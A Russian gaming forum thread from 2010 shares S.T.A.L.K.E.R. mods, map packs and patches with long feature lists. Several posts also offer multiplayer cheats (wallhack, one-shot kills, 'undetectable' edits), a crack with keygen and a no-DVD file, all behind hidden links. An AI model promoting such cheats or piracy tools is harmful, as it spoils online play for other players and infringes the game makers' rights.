+бонус, на Баре, в режиме deathmatch доступна Арена.htp://stalkermaps.ucoz.ru
+бонус, отдельно две карты Бассейн и Лаборатория , добавлены отсутствующие режимы artefacthunt на обе карты. ТУТ (You can see links before reply)

Robot_2006
19.01.2010, 22:57
Вот чит мною написаный для игры по сети You can see links before reply
прыжки, точность, убийство с 1 пули на ил 86 удобен в установке и в использовании (не надо ни чего копировать). Если кому нужны какие то особые читы пишите.

Хотелось бы уточнить! Чит(ы) или Геймдата! ;)

Gelo
28.01.2010, 14:15
Универсальный кряк. Присутствует кейген(На работоспособность не проверял).
Айфолдер чет не грузица так что залил на народ You can see links before reply

[punisher1885
13.02.2010, 23:23
You can see links before reply
Это ссылка зомби мода для Тч для мультиплеера

Описание:
Мод предназначен для ТЕНЕЙ ЧЕРНОБЫЛЯ с патчем 1.04 Патчер ( переход с 1.06 на 1.04 БЕЗ переустановки игры ) можно скачать -тут- Известные баги: I Игрокам: 1- Если в инвентаре появляется нож, его выкидывание приводит к вылету 2- Открывание магазина\возрождение ДО того как появляется белая надпись внизу экрана приводит к вылету II Админам Что бы не портить впечатление от мода, и не противоречить его смыслу, пожалуйста, выполняйте следующие правила: 1- Игроков-зомби должно быть больше чем игроков-людей 2- Разогрев и изменение времени исчезновения предметов испортят всю игру III Если вы нашли баг\недоработку , или у вас появились интересные идеи - пишите их deimos_hate_idiots IV Создавая сервер на моде в его названии нужно указать что он работает с модом =)Видео к модуСоздатели мода:-=[GZ]=-Deimos'a и Sierr@-1Фан сайт по сталкер Stalker-Ghost.ru
Видео :
You can see links before reply

Завтра буду вечером где- то с 6 вечера по московскому тестить мод приглашаю всех на тест(пока без читов) название сервера punisher1885

Strage
16.02.2010, 15:44
Вот Sigerous Mod на ТЧ:Название модификации: Sigerous Mod
Предназначение: S.T.A.L.K.E.R. - Тени Чернобыля
Автор: Болотов Николай (GeJorge или Nick_Mondyfic)
Необходимый патч: 4.
Ссылка для скачивания мода:You can see links before reply и небольшой фикс к нему:You can see links before reply

- Нужно начать новую игру
- Существенно изменена сюжетная линия
- Организовано большое количество сцен (по типу как на Свалке, в начале локации, момент с Юриком)
- Добавил в игру систему разных характеристик оружия, например если вы найдете два автомата АК-74, то увидете что их характеристики урона или меткости - разные...Но к сожелению это не всегда будет видно, поскольку бывают случаи когда одни и те же сталкеры спавнятся по несколько раз, так как например на АТП..
- Добавлена ночная симуляция жизни, т.э. ночью будут просыпатся монстры, и нападать на всех, а к утру они будут снова ложится спать, чтобы ночью опять проснутся.
- Теперь реально сложно выжить в зоне, для того чтобы разжится деньжатами необходимо искать артефакты, они в игре редко встречаются и очень дорогие. Также сложность выжывания состоит в том что все группировки в зоне ведут между собой борьбу за территории, и вас без внимания не оставлят!
- Добавлено более 95 новых артефактов
- Добавлено более 11 новых видов аммуниции(патроны)
- Добавлены новые модификации на оружие(прицелы, подствольники и т.д)
- Добавлено более 100 новых бронекостюмов
- Добавлено 14 новых видов продуктов питания и медикаментов
- Добавлено 150 видов оружия
- Добавлено более 60 новых заданий(в том числе и в таск менеджере)
- Изменена погода
- Увеличен максимально переносимый вес (было 60кг, стало 120кг). Также если вы одените, например костюм "Еколога", то минимально и максимально переносимый вес повысится на определенную цифру, в зависимости от самого костюма.
- Графические изменения: главное меню, вид в игре(ХУД), инвентарь, меню торговли и т.д
- Активирована возможность повреждения бронекостюмов, во время перестрелок, и как пологается добавил возможность починки бронекостюмов и оружия.
- Изменены пост-еффекты от аномалий
- Разблокировано покачивание прицела
- Добавлена возможность вступления в различные группировки
- Можно модернизировать оружие(покупая для него новые детали или за деньги) и бронекостюмы(за деньги)
- Изменено описание тайников
- Можно покупать месторасположение тайников
- По всем локациям разбросаны флеш-носители с секретной информацией, которые можно продавать торговцам.
- Теперь ранения заживают очень медленно, и для остановки кровотечения необходимо использовать бинты или бумагу
- Добавлено два бронекостюма в которых можно бегать, неуставая.
- У некоторых персонажей можно покупать(посредством диалога) что-то уникальное, а также каждый уникальный сталкер, будет иметь свой собственный асортимент продукции.
- Теперь с помощью ученых, на Янтаре, можно проводить експерименты над артефактами.
- В связи с существенным затемнением ночью, на многие бронекостюмы можно устанавливать ПНВ.(На свалке, у Прапора)
- Теперь в ПДА можно будет узнать практически обо всем...
- Добавлена система динамических сообщений.
- В процессе прохождения игры, в пда будет обновлятся рубрика "секреты", в которой можно будет узнать точное местонахождение секретных тайников.
- Теперь после виброса или затмения - будут рождатся новые артефакты, которые каждый раз будут "валятся" в разных местах.
- Учитивая различные ново-введения, было добавлено меню с дополнительными настройками мода, в котором можно настроить "МОД" как вам подобает.
- У некоторых ключевых персонажей активировано безсмертие, для того чтобы проходить сюжетные миссии - без проблем с мертвыми целями квестов.
- Теперь на СТАТИЧЕСКОМ освещении будет видно солнце.
- Добавлена система контроля за метками на карте. С помощью системы - улучшена работа меток, теперь они будут изчезать когда надо.
- Добавлены, новые тайники, а также что немаловажно это новый вид секретов - мини-тайники, которые будут выдаватся в награду за выполнение квестов.
- Полностью обновленная система энциклопедии.
- Возможность просмотра событий, с помощью - радио "Сталкер".
- Добавлены ТРИ(3) новые группировки, которые будут активно прогрессировать на территории зоны.
- Теперь ГГ не будет штурмовать базы противника в одиночку, к нему в процессе прохождения игры, будет приходить подкрепление. Количество солдат, которые будут вам помогать, будет зависить от вашего ранга и отношения к той или иной группировке.
- Изменен ХУД, с добавлением новых функции, таких как например: возможность узнать игровое время, не заходя в инвентарь или ПДА, а непосредственно сразу в игре.
- Собрав все кевларовые пластины для Бармена - можно получить уникальный комбинезон Стрелка.
- Исправил баги в заданиях Лукаша и Черепа - теперь без проблем можно выполнить задание Лукаша на уничтожение долговцов, и не испортить отношения с группировкой "ДОЛГ" (При этом не нужно стрелять по самим долговцам, ведь "Свобода" сама сможет с ними справится).
- Теперь за убийство главных персонажей типа "Фраера" или "Кочерги" - будут прибавлятся очки возможностей, за которые в главном меню можно будет покупать супер возможности (т.е бессмертие и прочее).
- В ночное время суток, все НПС, практически не видят.
- [И многое другое].................................................. ........
Скриншоты:You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply
You can see links before reply :good::good:

Все взято с сайта Stalker-mod.ru!!!

$!№9@r
10.03.2010, 21:16
Ну теперь в этот раздел закинем инжекторов, для разнообразия...

;) ;) ;)

Axel72
11.03.2010, 10:21
Мультихак


Кнопки:
NUMPAD 1 - Заморозить / Разморозить деньги.
NUMPAD 2 - Включить / Отключить возможность покупки всех вещей не зависимо от вашего ранга.
NUMPAD 3 - Wallhack + Chams( будешь видеть через стены )
NUMPAD 4 - Убрать туман, Убрать небо (Белый цвет), убрать деревья, траву.
NUMPAD 5 - Whitewalls - Покрасить всё в белый цвет.
NUMPAD 6 - Большие прыжки, скорость бега, нету урона от падений - ударов.
NUMPAD 7 - Увеличена меткость, Убрана отдача.
NUMPAD 8 - Sniper knife.
NUMPAD 9 - Убийство с 1 выстрела

You can see links before reply
за паролем в личку

iskan08
14.03.2010, 20:15
Хак для скрытого читерства! Это gamedata,мной подправленая: бесконечный бег,нет отдачи,немного усилена убойность патронов. Еще плюс ,то , что мало весит(удалил все ненужное)описание установки внутри,кому надо забераем!:-)You can see links before reply

QWERTY
17.03.2010, 22:27
извените незнаю как на сайт закачать ну вобщем вот=)

You can see links before reply - мой чит
Инфо:Шопхак+убийство с 1 патрона+прыжок20 ну и там ещо чуток есть=)
ПОЛЬЗУЙТЕСЬ

второй You can see links before reply чит полное безпаливо увеличен бег и нет демагав от падения отдачи нету юзайте;)

aleksei0014
31.03.2010, 15:43
Zombie Mod для версии 1.0006 , Запущен сервер

"Zombie Mod"

Создатели мода:-=[GZ]=-Deimos'a и Sierr@-1

You can see links before reply

SEG@
11.04.2010, 16:16
скажате плиз а в ТЧ патчи нужно от 1 до 6 поочерёдно ставить или можно сразу 6 пихнуть и все. если нужны все то оставте ссылку на них. А если один то только на 4 и 6 .

Вот тебе патчи You can see links before reply сначала установишь 5 патч он ставится поверх голой игры,далее 6 поставишь и все, тут NO DVD You can see links before reply нормальный в папку bin кидай.

yралец
23.04.2010, 10:24
Вот мод на тени Чернобыля


Инструкция по установке мода:
сначала устанавливаем STALKER_OGSE_069.exe, после распаковывваем в удобное для вас место gamedata_fix_069_26.7z. затем находим в распакованном архиве папку gamedata и засовываем в папку с игрой, потверждая замену))) все очень просто)))
!!! ogs evolution mod устанавливается только на игру пропатченную до 1.005 версии!!! с другими не пойдет.


You can see links before reply (You can see links before reply)

Удачной игры, Сталкер!!!
Темный Сталкер



OGSE 0.6.9 MOD STALKER ТЕНИ ЧЕРНОБЫЛЯ.rar (You can see links before reply 9D%D0%98%20%D0%A7%D0%95%D0%A0%D0%9D%D0%9E%D0%91%D0 %AB%D0%9B%D0%AF.rar.html)

DzoT
23.05.2010, 12:05
Вот мод зона порожения! Тем кто любит с монстрами помисицА! You can see links before reply
Люди выкладывайте свои моды!Укого-что есть!
Там есть 6-ти ствольный пулемёт,а монстров дофига!!!!!!!

You can see links before reply Мод ЗОНА ПОРОЖЕНИЯ 2.ОТВЕТНЫЙ УДАР!(класно звучит?)
Игра начинается после концовки первой ЗОНЫ ПОРОЖЕНИЯ когда в припяти разбивается ваш вертолёт!Устанавливаем етот мод и продолжаем ИГРАТ!
Вы появляетесь в мёртвом городе ПРИПЯТЬ ,вокрук радиацццыя нет нормальной защиты и из оружия увас один только пистолет пусть даже это и ДИГЛ с разрывными пулями!Задача проста:выжить, и добраться до КОРДОНА!
Приятной игггры!

МОД Исполнитель Желаний.Это самый популярный мод АБС ИНФЕРНО! You can see links before reply

[DRAKON]RAPTOR
12.08.2010, 22:40
SGM для S.T.A.L.K.E.R. Тени Чернобыля

Название модификации: Sigerous Mod
Предназначение: S.T.A.L.K.E.R. - Тени Чернобыля
Автор: Болотов Николай (GeJorge или Nick_Mondyfic)
Необходимый патч: 1.0004.

Нужно начать новую игру.
- Существенно изменена сюжетная линия
- Организовано большое количество сцен (по типу как на Свалке, в начале локации, момент с Юриком)
- Добавил в игру систему разных характеристик оружия, например если вы найдете два автомата АК-74, то увидите что их характеристики урона или меткости - разные... Но к сожалению это не всегда будет видно, поскольку бывают случаи когда одни и те же сталкеры спавнятся по несколько раз, так как например на АТП..
- Добавлена ночная симуляция жизни, т.е. ночью будут просыпаться монстры, и нападать на всех, а к утру они будут снова ложится спать, чтобы ночью опять проснутся.
- Теперь реально сложно выжить в зоне, для того чтобы разжиться деньжатами необходимо искать артефакты, они в игре редко встречаются и очень дорогие. Также сложность выживания состоит в том что все группировки в зоне ведут между собой борьбу за территории, и вас без внимания не оставят!
- Добавлено более 95 новых артефактов
- Добавлено более 11 новых видов амуниции (патроны)
- Добавлены новые модификации на оружие(прицелы, подствольники и т.д)
- Добавлено более 100 новых бронекостюмов
- Добавлено 14 новых видов продуктов питания и медикаментов
- Добавлено 150 видов оружия
- Добавлено более 60 новых заданий(в том числе и в таск менеджере)
- Изменена погода
- Увеличен максимально переносимый вес (было 60кг, стало 120кг). Также если вы оденете, например костюм "Эколога", то минимально и максимально переносимый вес повысится на определенную цифру, в зависимости от самого костюма.
- Графические изменения: главное меню, вид в игре(ХУД), инвентарь, меню торговли и т.д
- Активирована возможность повреждения бронекостюмов, во время перестрелок, и как полагается добавил возможность починки бронекостюмов и оружия.
- Изменены постэффекты от аномалий
- Разблокировано покачивание прицела
- Добавлена возможность вступления в различные группировки
- Можно модернизировать оружие(покупая для него новые детали или за деньги) и бронекостюмы(за деньги)
- Изменено описание тайников
- Можно покупать месторасположение тайников
- По всем локациям разбросаны флеш-носители с секретной информацией, которые можно продавать торговцам.
- Теперь ранения заживают очень медленно, и для остановки кровотечения необходимо использовать бинты или бумагу
- Добавлено два бронекостюма в которых можно бегать, не уставая.
- У некоторых персонажей можно покупать(посредством диалога) что-то уникальное, а также каждый уникальный сталкер, будет иметь свой собственный ассортимент продукции.
- Теперь с помощью ученых, на Янтаре, можно проводить эксперименты над артефактами.
- В связи с существенным затемнением ночью, на многие бронекостюмы можно устанавливать ПНВ.(На свалке, у Прапора)
- Теперь в ПДА можно будет узнать практически обо всем...
- Добавлена система динамических сообщений.
- В процессе прохождения игры, в пда будет обновляться рубрика "секреты", в которой можно будет узнать точное местонахождение секретных тайников.
- Теперь после выброса или затмения - будут рождаться новые артефакты, которые каждый раз будут "валятся" в разных местах.
- Учитывая различные нововведения, было добавлено меню с дополнительными настройками мода, в котором можно настроить "МОД" как вам подобает.
- У некоторых ключевых персонажей активировано бессмертие, для того чтобы проходить сюжетные миссии - без проблем с мертвыми целями квестов.
- Теперь на СТАТИЧЕСКОМ освещении будет видно солнце.
- Добавлена система контроля за метками на карте. С помощью системы - улучшена работа меток, теперь они будут исчезать когда надо.
- Добавлены, новые тайники, а также что немаловажно это новый вид секретов - мини-тайники, которые будут выдаваться в награду за выполнение квестов.
- Полностью обновленная система энциклопедии.
- Возможность просмотра событий, с помощью - радио "Сталкер".
- Добавлены ТРИ(3) новые группировки, которые будут активно прогрессировать на территории зоны.
- Теперь ГГ не будет штурмовать базы противника в одиночку, к нему в процессе прохождения игры, будет приходить подкрепление. Количество солдат, которые будут вам помогать, будет зависеть от вашего ранга и отношения к той или иной группировке.
- Изменен ХУД, с добавлением новых функции, таких как например: возможность узнать игровое время, не заходя в инвентарь или ПДА, а непосредственно сразу в игре.
- Собрав все кевларовые пластины для Бармена - можно получить уникальный комбинезон Стрелка.
- Исправил баги в заданиях Лукаша и Черепа - теперь без проблем можно выполнить задание Лукаша на уничтожение долговцов, и не испортить отношения с группировкой "ДОЛГ" (При этом не нужно стрелять по самим долговцам, ведь "Свобода" сама сможет с ними справится).
- Теперь за убийство главных персонажей типа "Фраера" или "Кочерги" - будут прибавляться очки возможностей, за которые в главном меню можно будет покупать супер возможности (т.е бессмертие и прочее).
- В ночное время суток, все НПС, практически не видят.
- [И многое другое].................................................. ........

You can see links before reply - одним файлом.
И по частям:
- You can see links before reply часть 1;
- You can see links before reply часть 2;
- You can see links before reply часть 3.
Скачиваем все 3 части запускаем часть 1 далее всё будет распаковываться автоматом.

А ВОТ И ФИКС, ПОСЛЕДНИЙ:
You can see links before reply
Призван поправить вылет на Радаре.

Re]Spawner
28.08.2010, 20:52
Мультихак


Кнопки:
NUMPAD 1 - Заморозить / Разморозить деньги.
NUMPAD 2 - Включить / Отключить возможность покупки всех вещей не зависимо от вашего ранга.
NUMPAD 3 - Wallhack + Chams( будешь видеть через стены )
NUMPAD 4 - Убрать туман, Убрать небо (Белый цвет), убрать деревья, траву.
NUMPAD 5 - Whitewalls - Покрасить всё в белый цвет.
NUMPAD 6 - Большие прыжки, скорость бега, нету урона от падений - ударов.
NUMPAD 7 - Увеличена меткость, Убрана отдача.
NUMPAD 8 - Sniper knife.
NUMPAD 9 - Убийство с 1 выстрела

You can see links before reply
за паролем в личку


Насколько я помню, на сайте мы должны выкладывать свои моды, но это-НЕ.ТВО.Ё! я могу его же выложить БЕЗ ПАРОЛЯ! You can see links before reply

Sveta
28.08.2010, 21:11
Spawner;23151']Насколько я помню, на сайте мы должны выкладывать свои моды, но это-НЕ.ТВО.Ё! я могу его же выложить БЕЗ ПАРОЛЯ! You can see links before reply

Ты не прав, моды и любые файлы не обязательно должны быть свои. Единственная оговорка : говорить, откуда был взят файл, если он не является собственностью того, кто выкладывает этот мод.

Re]Spawner
29.08.2010, 10:26
Ты не прав, моды и любые файлы не обязательно должны быть свои. Единственная оговорка : говорить, откуда был взят файл, если он не является собственностью того, кто выкладывает этот мод.
Сколько же у нас тогда врунов на сайте... ладно: вот короче мод позволяет вступать в любую группировку, кроме СТАЛКЕРЫ. Чтобы вступить в группировку, достаточно принести флэшку шустрого сидоровичу, и посмотреть диалог: Я хочу вступить в новою группировку. Вот и все. avtor-PILOTEL You can see links before reply :declare: самыйц прикол в том, что можно вступить в группировку и ЛУПИТЬ В СВОИХ ДРУЗЕЙ-НИКАКОЙ РЕАКЦИИ- мочи скок хошь и забиай инвентарь)))

[DRAKON]RAPTOR
05.09.2010, 23:34
LOST WORLD Condemned
Автор:Создавая данную сборку я в первую очередь задумывался над атмосферой и возвращением вырезанных и необходимых возможностей которые сделают игру максимально интересной и максимально труднопроходимой.Мод НЕ ЯВЛЯЕТСЯ СОЛЯНКОЙ и в плане этики модостроителей СОВЕРШЕННО ЛЕГАЛЕН.Все люди пытающиеся уличить мод и его автора в несоблюдении этики модостроителей будут наказаны с применением любых доступных способов влияния.

Выражаю огромную благодарность
Создателям модов

* This Real Gun
* Lootmoney
* ZovPripyatiTez
* Дополнение 8
* Simbion
* Худы примитивных вещей(Starter, ВЛАД ,ФеНиКс, ALEX BOY ,Shadows)
* Re-animation project
* Ai pack
* Dialogs Pack
* Girl Mod
* LURK 1.1
* Arena Extension Mod
* Arsenal Mod
* Ammo on belt
* STALKER_Complete_2009
* STALKER MAP PACK
* Steel Mod by Danilla
* Кулак мод
* OGSE
* OGSM
* AMK
* AtmosFear Mod
* Mines mod 1.3
* Сайту banana.com а именно TenSnake

Особая благодарность

* Dodelkin
* Stalk15
* Владимиру Ермакову
* Kamikazze
* Labus
* Goroskob
* Sin
* Lex017
* Феникс
* 22ff
* KingFriday
* КD87
* Galil
* Domestos
* Argus
* WeTaLeR
* Piter
* MCHC Raider

Рекомендуемые настройки
Для игры требуется Лицензионная версия желательно 6-5 патчи.
При тестировании на ПИРАТСКИХ версиях вылеты непредсказуемы

Вылеты
При возникновении вылета если вы хотите получить техпомощь то вы ОБЯЗАНЫ предоставить :

* лог ошибки
* вашу версию и патч игры
* подробные обстоятельства вылета

БЕЗ ВЫШЕУКАЗАННОЙ ИНФОРМАЦИИ ПОМОЩЬ ОКАЗАНА НЕ БУДЕТ

Особенности

1 Еда и медикаменты

* Некоторые медикаменты и еда используются несколько раз.Вы же не запихнете целый батон или палку колбасы одним заходом в рот.Поэтому относитесь спокойно к тому что при нажатии на еду и т.д они не исчезают сразу.Пока вы едите или используете медикаменты - нельзя пользоваться оружием.Действие всех медикаментов и еды постепенно.Если у вас здоровье уменьшается само тобой значит вы схватили малую дозу радиации.Радиация не выводится из организма.Если не примете меры то умереть можно буквально через 4 игровых дня.Также при получении большой дозы радиации или ранения - вы увидите постэффекты.

2 Пояс

* Патроны должны вешаться на пояс чтобы вы смогли перезарядить оружие.

3 Население локаций

* В моде соблюдена атмосфера действительно завораживающей зоны поэтому почти все локации ПУСТЫННЫ НО НЕ ПУСТЫ.очень часто многие говорят что локации не заселены но это не так.Откройте наконец глаза и вспомните книжную зону.там никто вам на глаза просто так не попадется.

4 Костюмы
Восстановлены вырезанные виды экипировки но произведен их тщательный отбор и редактирование с учетом их сильных и слабых сторон.Например костюм СЕВА неплохо защитит вас от аномалий но быстро придет в негодность при частых попаданиях и ударах электры так как почти все полезные свойства костюма работают от электроники.Экзоскелет же наоборот хорошо защитит от пуль и прослужит достаточно времени без критического износа но при попадании в жарку большинство важных элементов костюма расплавятся.

5 Диалоги
Присутствуют новые диалоги которые оживляют процесс общения с населением зоны.

6 Торговля
Система купли/продажи приведена к системе чн - теперь каждая вещь будет доставаться вам с большим трудом а накопить миллион продавая оптом мелкие артефакты невозможно

7 Характеристики игрока
Изменены жизненные параметры Меченого такие как рост переносимый вес устойчивость к различным ранениям и аномалиям.Теперь погибнуть можно моментально даже в самой безобидной ранее аномалии.к тому же они сделаны невидимыми что стимулирует надобность в детекторах.

СПИСОК ИЗМЕНЕНИЙ

Инвентарь
Исправление некорректного отображения ячеек рюкзака для широкоформатных мониторов
1 открыть inventory_new.xml
2 просмотреть до строки dragdrop_bag
3 в этой строке найти height="300" и исправить на height="207"
4 И то же самое проделать для inventory_new_16.xml

Расширен стандартный сюжет с персонажами чн+сюжет Зова Припяти от лица Стрелка
16 новых локаций

* Припять
* Юпитер
* Затон
* Мертвый Город
* Подземелья Припяти
* Рыжий Лес
* Лиманск
* Госпиталь
* Генераторы
* Болота
* Логово
* Лесная чаща
* Военная лаб-рия
* Темный Лес
* Деревня
* Пещера

Вырезанные костюмы
Улучшение экипировки
Вступление в новые и старые группировки
Фриплей
Полностью переработаны циклы погоды
Оружие

* ПКМ(озвучка из чн)
* Слон
* Сайга
* ТОЗ 34
* Охотничье ружье
* Steyr Aug A3
* беретта
* FN2000 из билда
* FAMAS P3
* FN P90
* 3 гранаты
* 3 взрывчатки + детонаторы

Медикаменты и еда

* Жгут
* Амфетамин
* Первитин
* Антисептик
* Сгущенка
* Индивидуальный пищевой рацион Бойца и Спецназа
* Минеральная вода

Атмосферные звуковые сопровождения
16 Новых артефактов из книг
Выброс и динамические аномалии
Можно

* Играть на гитаре губной гармошке слушать рацию
* Создать свой тайник
* Починить оружие или броню ремонт-комплектом
* Спать

Новый худ за моим авторством и интерфейс в стиле зова припяти
Динамические новости о смерти событиях и выбросе
Улучшен аи вертолетов и нпс а именно

* Кидание гранат
* Переодевание
* Обыск тайников
* Удар прикладом
* Самолечение и лечение других
* Очистка территории от трупов
* Работа напарником
* Приветствие при приближении
* Обыск трупов

Снятие денег с трупов
Восстановлены вырезанные анимации нпс
Полноценная арена
другие более мелкие изменения

ссылка для скачивания:
You can see links before reply

Dyxxx
10.09.2010, 00:27
Вот патч отката с любой версии до v. 10004.
Я откатывал с v. 10007. не куда не чего переносить не надо просто установка. патч сам найдет файл игры
You can see links before reply

[DRAKON]RAPTOR
13.09.2010, 02:44
You can see links before reply (You can see links before reply)
пак из 14 карт для сетевого режима:
mp_autostation (S.T.A.L.K.E.R. - Чистое Небо)
mp_cs_base (Часть карты "Болото" из сингла S.T.A.L.K.E.R. - Чистое Небо)
mp_firestation (S.T.A.L.K.E.R. - Чистое Небо)
mp_garbage (S.T.A.L.K.E.R. - Чистое Небо)
mp_hospital (Из сингла S.T.A.L.K.E.R. - Чистое Небо)
mp_industrial (S.T.A.L.K.E.R. - Чистое Небо)
mp_jupiter_underground (Из сингла S.T.A.L.K.E.R. - Зов Припяти)
mp_limansk (S.T.A.L.K.E.R. - Чистое Небо)
mp_pogost (Из аддона "Обречённый город")
mp_red_forest (Из сингла S.T.A.L.K.E.R. - Чистое Небо)
mp_rembasa (S.T.A.L.K.E.R. - Чистое Небо)
mp_sport_center (S.T.A.L.K.E.R. - Чистое Небо)
mp_training_camp (S.T.A.L.K.E.R. - Чистое Небо)
mp_warlab (Из сингла S.T.A.L.K.E.R. - билд 1935)
mp_autostation
Версия 0.2
НЕ совместима с предыдущими версиями!
В данной версии исправлены непроходимые/непростреливаемые кусты.
Территория доступная для игры значительно расширена по сравнению со стандартной версией этой карты,
модели двух домов заменены на аналогичные с карты Dead City, но с проработанными внутренними помещениями.

mp_cs_base
Версия 0.5
Часть карты "Болото" из сингла S.T.A.L.K.E.R. - Чистое Небо где начиналось прохождение сюжетной линии
и располагалась база группировки "Чистое небо".

mp_firestation
Версия 0.3
НЕ совместима с предыдущими версиями!
В данной версии исправлены непроходимые/непростреливаемые кусты. Для улучшения баланса в режиме АХ изменено расположение базы "Наёмников".

mp_garbage
Версия 0.2
НЕ совместима с предыдущими версиями!
В данной версии исправлены непроходимые/непростреливаемые кусты.

mp_hospital
Версия 0.7
Часть карты "Госпиталь" из сингла S.T.A.L.K.E.R. - Чистое Небо.
Добавлены объекты позволяющие беспрепятственно передвигаться по карте в любом направлении, т.к. оригинальная
версия карты предусматривала одностороннее прохождение.

mp_industrial
Версия 0.4

mp_jupiter_underground
Версия 0.5
Совместима с версией 0.4.
Карта из сингла S.T.A.L.K.E.R. - Зов Припяти.
Отличается от оригинала наличием нескольких новых лестниц и переходов для доступа к ранее недоступным частям карты.
В версии 0.5 пофиксен глюк с несколькими лестницами расположенными в центральной части карты и не имеющими
привязки к реально существующим лестницам или другим объектам.
Режимы: АХ и ДМ.

mp_limansk
Версия 0.4
Совместима с версией 0.3.
В версии 0.4 восстановлены костры, переработана система респаунов (количество баз уменьшено до двух на команду,
респауны на базах расположенны более правильно), пофиксено неправильное отображение (ориентация) текстуры
деревянных планок.

mp_pogost
Версия 0.2

mp_red_forest
Версия 1.3
Совместима с версией 1.2.
Карта из сингла S.T.A.L.K.E.R. - Чистое Небо.
Пофиксено неправильное отображение (ориентация) текстуры деревянных планок.
Данная карта портирована в содружестве с [ФСБ]П.А.Х.А.Н.
Не очень удачная версия этой карты, но это был наш первый опыт по портированию локаций из сингла ЧН.
На данный момент существующие недочёты могли бы быть исправлены, но тратить время на компиляцию столь
объёмного проекта уже лень, да и не имеет никакого смысла, т.к. они весьма незначительны.

mp_rembasa
Версия 0.1

mp_sport_center
Версия 0.5
Совместима с версией 0.4.
В версии 0.5 восстановлены костры, незначительно переработана система респаунов, пофиксено неправильное отображение (ориентация) текстуры деревянных планок.

mp_training_camp
Версия 0.2
Совместима с версией 0.1.
В версии 0.2 незначительно переработана система респаунов.

mp_warlab
Версия 0.6
Режимы: ДМ, ТДМ

ссылка для скачивания: You can see links before reply